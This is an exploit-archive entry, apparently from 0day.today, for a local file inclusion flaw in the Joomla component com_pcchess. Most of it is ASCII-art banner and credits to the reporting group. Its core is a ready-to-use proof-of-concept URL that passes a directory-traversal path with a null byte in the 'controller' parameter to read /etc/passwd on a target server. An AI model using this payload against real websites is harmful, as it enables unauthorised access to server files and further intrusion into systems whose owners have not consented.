joomla Component com_pcchess Local File Inclusion Vulnerability

2010-04-09T00:00:00
ID 1337DAY-ID-11692
Type zdt
Reporter TEAMELITE
Modified 2010-04-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================================
Joomla Component com_pcchess Local File Inclusion Vulnerability
===============================================================

================================================================================================
================================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@            @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@	       @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@            @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@            @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==											      ==
================================================================================================
================================================================================================
		 |||                                    |||
		 |||					|||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[  								                                                     	[[  
[[ joomla Component com_pcchess Local File Inclusion Vulnerability 						        [[
[[															[[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				       	[[
[[															[[
[[ ##   Exploit: index.php?option=com_pcchess&controller=[LFI]%00							[[
[[															[[
[[ ##   PoC: 													        [[
[[															[[
[[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[
[[															[[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
		 |||					|||
		 |||					|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~									~~~~
~~~~    MC team : team_elite , devilbat , zreg				~~~~
~~~~    thanks for : cr4wl3r						~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




#  0day.today [2018-01-11]  #